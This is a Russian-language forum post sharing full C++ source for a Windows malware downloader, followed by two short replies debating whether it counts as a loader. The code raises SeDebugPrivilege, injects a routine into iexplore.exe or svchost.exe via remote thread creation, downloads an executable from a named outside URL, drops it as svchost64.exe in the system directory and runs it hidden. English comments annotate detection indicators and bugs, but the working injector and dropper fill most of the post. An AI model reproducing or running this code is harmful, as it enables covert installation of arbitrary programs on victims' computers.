
Загрузчик С++

загрузчик made in China
#include "stdafx.h”
#include “stdio.h”
#include “string.h”
#include <windows.h>
#include <wininet.h>
#include “tlhelp32.h”
#pragma comment(lib,”wininet.lib“)

/***********************************************/
// Function-pointer types for every Win32 API the injected routine (ThreadProc) uses.
// Nothing below is called through the import table from inside the remote process:
// each pointer is filled in at run time via GetProcAddress on the name strings
// carried in the Inject block (see ThreadProc). Resolving APIs by name string like
// this is itself a detection/triage signal for analysts.
typedef HINSTANCE (__stdcall *fun_ShellExecute)(HWND hWnd,     // shell32!ShellExecuteA
                       LPCTSTR lpOperation,
                       LPCTSTR lpFile,
                       LPCTSTR lpParameters,
                       LPCTSTR lpDiretory,
                       INT nShowCmd);

typedef int (__stdcall *fun_MessageBox)(HWND hWnd, LPCTSTR lpszText,  // user32!MessageBoxA (resolved in ThreadProc, never called)
                    LPCTSTR lpszCaption, UINT nType);

// define functions in kernel32.dll
typedef HANDLE (__stdcall *fun_CreateFile)( LPCTSTR, DWORD, DWORD, // kernel32!CreateFileA
                     LPSECURITY_ATTRIBUTES,
                     DWORD, DWORD, HANDLE );
typedef BOOL (__stdcall *fun_WriteFile)( HANDLE, LPCVOID, DWORD,   // kernel32!WriteFile
                    LPDWORD, LPOVERLAPPED );
typedef BOOL (__stdcall *fun_CloseHandle)( HANDLE hObject );  // kernel32!CloseHandle
typedef HMODULE (__stdcall *fun_GetModuleHandle)(LPCTSTR);  // kernel32!GetModuleHandleA
typedef FARPROC (__stdcall *fun_GetProcAddress)(HMODULE, LPCTSTR); // kernel32!GetProcAddress
typedef HINSTANCE (__stdcall *fun_LoadLibrary)(LPCTSTR);    // kernel32!LoadLibraryA

// define functions in wininet.dll
typedef HINTERNET (__stdcall *fun_InternetOpen)(IN LPCTSTR lpszAgent, // wininet!InternetOpenA; lpszAgent becomes the HTTP User-Agent
                       IN DWORD dwAccessType,
                       IN LPCTSTR lpszProxyByName,
                       IN LPCTSTR lpszProxyByPass,
                       IN DWORD dwFlags);
typedef HINTERNET (__stdcall *fun_InternetOpenUrl)(IN HINTERNET hInternet,// wininet!InternetOpenUrlA
                         IN LPCTSTR lpszUrl,
                         IN LPCTSTR lpszHeaders OPTIONAL,
                         IN DWORD dwHeadersLength,
                         IN DWORD dwFlags,
                         IN DWORD dwContext);
typedef HINTERNET (__stdcall *fun_InternetReadFile)(IN HINTERNET hFile, // wininet!InternetReadFile. NOTE(review): declared here as returning HINTERNET although the Win32 API returns BOOL; ThreadProc only tests the result for non-zero, so the mismatch is harmless there
                         IN LPVOID lpBuffer,
                         IN DWORD dwNumberOfBytesToRead,
                         OUT LPDWORD lpdwNumberOfBytesRead);
typedef HINTERNET (__stdcall *fun_InternetCloseHandle)(IN HINTERNET hInternet); // wininet!InternetCloseHandle (real return type is BOOL; the result is ignored by ThreadProc)

typedef struct tag_Inject       // Configuration block copied into the target process right after the ThreadProc code (see InsertThread)
           {
           // Bootstrap pointers, filled by InsertThread from the injector's own kernel32.
           // They are the only way the copied code reaches any API.
           fun_GetModuleHandle GetModuleHandle;
           fun_GetProcAddress GetProcAddress;
           fun_LoadLibrary LoadLibrary;
           // DLL names passed to GetModuleHandle/LoadLibrary.
           char szKernel[32];
           char szUser[32];
           char szNet[32];
           char szShell[32];
           // Export names passed to GetProcAddress.
           char szMessageBox[32];
           char szInternetOpen[32];
           char szInternetOpenUrl[MAX_PATH];
           char szInternetReadFile[128];
           char szInternetCloseHandle[32];
           char szCreateFile[32];
           char szWriteFile[32];
           char szCloseHandle[32];
           char szShellExecute[32];
           // Request data: extra HTTP header and the User-Agent string handed to InternetOpen.
           char szHeader[16];
           char szInterFlag[32];
           char szOpenFlag[10];        // initialised to "wba" by InsertThread; not referenced by ThreadProc
           // Download URL and destination path of the dropped file.
           char szUrlAddr[MAX_PATH];
           char szUrlAddr1[MAX_PATH];  // not referenced by ThreadProc
           char szFilePath[MAX_PATH];
           char szFilePath1[MAX_PATH]; // not referenced by ThreadProc
           }Inject;

/***************************************/

/************************************************/
/*
 * Injected payload routine.
 *
 * InsertThread copies the bytes of this function (up to AddressFlag) into the
 * target process and starts them with CreateRemoteThread, passing a pointer to
 * the Inject configuration block as the thread argument. Every Win32 API used
 * here is reached through the pointers and name strings carried in Inject_info,
 * never through this module's own imports.
 *
 * Behaviour: download Inject_info->szUrlAddr over WinINet, write it to
 * Inject_info->szFilePath, then launch that file with ShellExecuteA and SW_HIDE.
 *
 * Analyst notes (what a detection would observe, all from the host process):
 *   - WinINet session with the User-Agent in szInterFlag and header szHeader,
 *   - a new executable created in the path in szFilePath,
 *   - ShellExecute of that file with a hidden window.
 *
 * Returns FALSE when a module, export, internet handle or file cannot be
 * obtained; handles opened before such a failure are not released on those
 * paths. Returns TRUE after the launch has been requested.
 */
static BOOL ThreadProc(Inject* Inject_info)
{
 HMODULE hKernel32, hUser32, hWininet, hShell32; // module handles resolved below

 fun_InternetOpen j_InternetOpen;      // API pointers resolved through Inject_info->GetProcAddress
 fun_InternetOpenUrl j_InternetOpenUrl;
 fun_InternetReadFile j_InternetReadFile;
 fun_InternetCloseHandle j_InternetCloseHandle;
 fun_CreateFile j_CreateFile;
 fun_WriteFile j_WriteFile;
 fun_CloseHandle j_CloseHandle;
 fun_MessageBox j_MessageBox;
 fun_ShellExecute j_ShellExecute;

 // Each DLL is first looked up as already loaded; only if absent is it loaded.
 hKernel32 = Inject_info->GetModuleHandle(Inject_info->szKernel); // kernel32
 if (NULL == hKernel32)
 {
   hKernel32 = Inject_info->LoadLibrary(Inject_info->szKernel);
   if (NULL == hKernel32)
   {
     return FALSE;
   }
 }

 hUser32 = Inject_info->GetModuleHandle(Inject_info->szUser);
 if (NULL == hUser32)
 {
   hUser32 = Inject_info->LoadLibrary(Inject_info->szUser);
   if (NULL == hUser32)
   {
     return FALSE;
   }
 }

 hWininet = Inject_info->GetModuleHandle(Inject_info->szNet);
 if (NULL == hWininet)
 {
   hWininet = Inject_info->LoadLibrary(Inject_info->szNet);
   if (NULL == hWininet)
   {
     return FALSE;
   }
 }

 hShell32 = Inject_info->GetModuleHandle(Inject_info->szShell);
 if (NULL == hShell32)
 {
   hShell32 = Inject_info->LoadLibrary(Inject_info->szShell);
   if (NULL == hShell32)
   {
     return FALSE;
   }
 }

 // Export resolution by name string. None of these results is NULL-checked
 // before use.
 j_InternetOpen = (fun_InternetOpen)Inject_info->GetProcAddress(hWininet,          // InternetOpenA
                                 Inject_info->szInternetOpen);
 j_InternetOpenUrl = (fun_InternetOpenUrl)Inject_info->GetProcAddress(hWininet,       // InternetOpenUrlA
                                    Inject_info->szInternetOpenUrl);
 j_InternetReadFile = (fun_InternetReadFile)Inject_info->GetProcAddress(hWininet,      // InternetReadFile
                                     Inject_info->szInternetReadFile);
 j_InternetCloseHandle = (fun_InternetCloseHandle)Inject_info->GetProcAddress(hWininet,   // InternetCloseHandle
                                       Inject_info->szInternetCloseHandle);

 j_CreateFile = (fun_CreateFile)Inject_info->GetProcAddress(hKernel32,            // CreateFileA
                               Inject_info->szCreateFile);
 j_WriteFile = (fun_WriteFile)Inject_info->GetProcAddress(hKernel32,             // WriteFile
                               Inject_info->szWriteFile);
 j_CloseHandle = (fun_CloseHandle)Inject_info->GetProcAddress(hKernel32,           // CloseHandle
                               Inject_info->szCloseHandle);
 j_MessageBox = (fun_MessageBox)Inject_info->GetProcAddress(hUser32,             // MessageBoxA (resolved but never called)
                               Inject_info->szMessageBox);
 j_ShellExecute = (fun_ShellExecute)Inject_info->GetProcAddress(hShell32,          // ShellExecuteA
                                 Inject_info->szShellExecute);
 HINTERNET hNet, hFile;                                   // WinINet session and URL handles

 // Session with the configured User-Agent (szInterFlag), system proxy settings.
 hNet = j_InternetOpen(Inject_info->szInterFlag, INTERNET_OPEN_TYPE_PRECONFIG,
             NULL, NULL, 0);
 if (NULL == hNet)
 {
   return FALSE;
 }

 // Fetch szUrlAddr, bypassing the WinINet cache; szHeader is sent as an extra request header.
 hFile = j_InternetOpenUrl(hNet, Inject_info->szUrlAddr, Inject_info->szHeader,
               strlen(Inject_info->szHeader),
               INTERNET_FLAG_DONT_CACHE|INTERNET_FLAG_RELOAD, 0);
 if (NULL == hFile)                                     // hNet is left open on this path
 {
   return FALSE;
 }

 char buff[1024];                                      // transfer buffer; reads are capped at 1023 bytes below
 DWORD dwRead,                                        // bytes returned by each InternetReadFile
     dwWritten = NULL;                                  // bytes written by each WriteFile (not checked)

 // Create (or truncate) the destination file named in szFilePath.
 HANDLE hCreateFile = j_CreateFile(Inject_info->szFilePath, GENERIC_READ|GENERIC_WRITE,
                   0, NULL, CREATE_ALWAYS, 0 ,NULL);
 if (NULL == hCreateFile)                                  // hNet and hFile are left open on this path
 {
   return FALSE;
 }
 // Stream the response body to disk until a zero-length read.
 while(j_InternetReadFile(hFile, buff, 1023, &dwRead))
 {
   if (0 == dwRead)         // end of body
     break;
   j_WriteFile(hCreateFile, buff, dwRead, &dwWritten, NULL); // return value and dwWritten are not checked

 }
 j_InternetCloseHandle(hNet);
 j_InternetCloseHandle(hFile);
 j_CloseHandle(hCreateFile);

 // Launch the dropped file with a hidden window; the result is not checked.
 j_ShellExecute(NULL, NULL, Inject_info->szFilePath, NULL, NULL, SW_HIDE);

 return TRUE;
}

// Empty marker function. InsertThread uses its address as the end of ThreadProc
// ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc) to size the code it copies, which
// presumes the compiler lays the two functions out contiguously in that order.
static void AddressFlag(void)
{
}
/******************************************************************************** ********************************/

/******************************************************************************** *******/
/*            ?????????? DEBUG                  */
/******************************************************************************** *******/

/******************************************************************************** ********************************/
// Enables SeDebugPrivilege on the current process token so that OpenProcess
// with PROCESS_ALL_ACCESS succeeds against other users' processes. A process
// adjusting its own token to gain SeDebugPrivilege shortly before OpenProcess/
// VirtualAllocEx/CreateRemoteThread is a classic injection indicator.
// Returns TRUE only if GetLastError() reads ERROR_SUCCESS after
// AdjustTokenPrivileges; the results of LookupPrivilegeValue and
// OpenProcessToken are not checked, and hToken is never closed.
BOOL ImprovePrivilege()
{
 HANDLE hToken = NULL ;               // current process token
 BOOL bRet = FALSE;                   // result
 TOKEN_PRIVILEGES tp = {1, {0, 0, SE_PRIVILEGE_ENABLED}};  // one privilege, LUID filled in below, attribute = enabled

 LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);  // LUID of SeDebugPrivilege
 OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
 AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof tp, 0, 0);  // enable SeDebugPrivilege
 bRet = (GetLastError() == ERROR_SUCCESS);        // AdjustTokenPrivileges may "succeed" yet set ERROR_NOT_ALL_ASSIGNED; this catches that
 return bRet;
}
/******************************************************************************** ********************************/

/******************************************************************************** *******/
/*            ??IExplore.exe???ID                   */
/******************************************************************************** *******/

/******************************************************************************** ********************************/
// Selects the injection target: walks a Toolhelp process snapshot and returns
// the PID of the first process whose lower-cased image name is "iexplore.exe"
// or "svchost.exe" (whichever is met first in snapshot order). Returns 0 when
// no such process exists, and also 0 (FALSE) when ImprovePrivilege fails, so
// the caller cannot distinguish the two.
// Resource notes: strProc (heap, 256 bytes) is never freed, and the snapshot
// handle is not closed on the two early returns.
DWORD Get_ProcID()
{
 char* strProc = new char[256];
 HANDLE hSnap;                            // Toolhelp snapshot
 PROCESSENTRY32 ppe;                         // current process entry

 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);      // not checked for INVALID_HANDLE_VALUE

 if (!ImprovePrivilege())                      // SeDebugPrivilege is needed for the later OpenProcess
 {
   return FALSE;
 }
 ppe.dwSize = sizeof( PROCESSENTRY32 );               // required before Process32First
 Process32First( hSnap, &ppe );                   // result not checked
 while ( 1 )     // scan every process for one of the two target names
 {
   strcpy(strProc, ppe.szExeFile); // szExeFile is MAX_PATH (260) wide, strProc is 256 bytes
   strProc = strlwr(strProc); // case-insensitive match via lower-casing
   if (0 == strcmp(strProc, “iexplore.exe“))// Internet Explorer
   {
     return ppe.th32ProcessID;
   }
   else if (0 == strcmp(strProc, “svchost.exe“))// any svchost instance
   {
     return ppe.th32ProcessID;
   }
   if ( !Process32Next( hSnap, &ppe ))
   {
     break;
   }
 }
 CloseHandle( hSnap );
 return 0;
}
/*************************************/

/******************************************************************************** *****/
/*   ? ThreadProc ???????????????????             */
/*************************************/

/*************************************/
// Injector. Builds the Inject configuration, then copies ThreadProc plus that
// configuration into the process chosen by Get_ProcID and runs it there.
// Sequence observable by an EDR: OpenProcess(PROCESS_ALL_ACCESS) ->
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> two WriteProcessMemory calls ->
// CreateRemoteThread whose start address lies in that fresh RWX region.
// Indicators carried in the configuration below: User-Agent "RookIE/1.0",
// download URL http://www.hf-hx.com/music/x.exe, dropped file
// <system directory>\svchost64.exe.
// Returns FALSE on any Win32 failure (hProc is not closed on those paths) and
// TRUE once the remote thread has been created.
BOOL InsertThread()
{
 char szSystemRoot[MAX_PATH];
 PDWORD pdwRemote = NULL; // base of the remote RWX allocation
 const int iCodeSize = ((LPBYTE)AddressFlag - (LPBYTE)ThreadProc);// size of ThreadProc, assuming AddressFlag follows it in memory

 Inject *InjectRemote = NULL; // where the Inject block lands in the remote process
 DWORD dwThread = NULL,
   dwOut = NULL,
    dwProc = Get_ProcID();   // target PID; 0 means "not found" (OpenProcess then fails)
 HANDLE hProc = NULL;
 const DWORD cbMemSize = iCodeSize + sizeof(Inject) + 3; // code + config + alignment slack

 // Field order matches struct tag_Inject. The three function pointers are filled in below.
 Inject Inject_stru = {NULL, NULL, NULL,
             “kernel32.dll“,
             “user32.dll“,
             “wininet.dll“,
             “shell32.dll“,
             “MessageBoxA“,
             “InternetOpenA“,
             “InternetOpenUrlA“,
             “InternetReadFile“,
             “InternetCloseHandle“,
             “CreateFileA“,
             “WriteFile“,
             “CloseHandle“,
             “ShellExecuteA“,
             “Accept: */*\r\n\r\n“,
             “RookIE/1.0“,
             “wba“,
             “[url]http://www.hf-hx.com/music/x.exe“[/url],
             “”}; // NOTE(review): the "[url]"/"[/url]" around the address look like forum markup leaked into the listing rather than part of the original source

 // Destination of the download: %SystemRoot%\system32\svchost64.exe (name chosen to blend in with svchost.exe).
 GetSystemDirectory(szSystemRoot, sizeof(szSystemRoot));
 strcat(szSystemRoot, “\\svchost64.exe“);
 strcpy(Inject_stru.szFilePath, szSystemRoot);

 // Bootstrap pointers taken from this process's kernel32; the payload relies on
 // kernel32 being mapped at the same address in the target.
 HMODULE hKernel32 = GetModuleHandle(”kernel32.dll“);
 Inject_stru.GetModuleHandle = (fun_GetModuleHandle)GetProcAddress(hKernel32, “GetModuleHandleA“);
 Inject_stru.GetProcAddress = (fun_GetProcAddress)GetProcAddress(hKernel32, “GetProcAddress“);
 Inject_stru.LoadLibrary = (fun_LoadLibrary)GetProcAddress(hKernel32, “LoadLibraryA“);

 hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProc);   // full access to the target
 if (NULL == hProc)
 {
   return FALSE;
 }

 // One RWX region for code and configuration together.
 pdwRemote = (PDWORD)VirtualAllocEx(hProc, NULL, cbMemSize, MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
 if (NULL == pdwRemote)
 {
   return FALSE;
 }

 // Copies cbMemSize bytes starting at ThreadProc, i.e. more than iCodeSize, so
 // the tail of the write is whatever follows ThreadProc in this image.
 if (!WriteProcessMemory(hProc, pdwRemote, (LPVOID)ThreadProc, cbMemSize, &dwOut))
 {
   return FALSE;
 }

 // Config block placed after the code at the next 4-byte boundary above iCodeSize.
 // NOTE(review): with this rounding the block can end up to 1 byte past cbMemSize;
 // presumably page granularity of VirtualAllocEx masks that.
 InjectRemote = (Inject*)(((LPBYTE)pdwRemote) + ((iCodeSize + 4) & ~3));
 if (!WriteProcessMemory(hProc, InjectRemote, &Inject_stru, sizeof(Inject_stru), &dwOut))
 {
   return FALSE;
 }

 // Start the copied ThreadProc in the target with the remote Inject block as its argument.
 if (NULL == CreateRemoteThread(hProc, NULL, 65535, (LPTHREAD_START_ROUTINE)pdwRemote, InjectRemote, 0, NULL))
 {
   return FALSE;
 }

 return TRUE;
}
/******************************************/

// GUI-subsystem entry point (no console window). Performs the injection and
// exits immediately; InsertThread's return value is discarded, so failure is
// silent. The downloaded program is launched from inside the target process,
// not from here.
int APIENTRY WinMain(HINSTANCE hInstance,
          HINSTANCE hPrevInstance,
          LPSTR   lpCmdLine,
          int    nCmdShow)
{
 InsertThread();
 return 0;
}
 
Где здесь загрузчик? Что он загружает? В моём понимании должны быть реализованы сеть или sqlite, но здесь обычный многопоточный инжектор
 
Где здесь загрузчик? Что он загружает? В моём понимании должны быть реализованы сеть или sqlite, но здесь обычный многопоточный инжектор
этот код с забугорного форума, там китаец выложил! а я слил ещё с другого борда)
 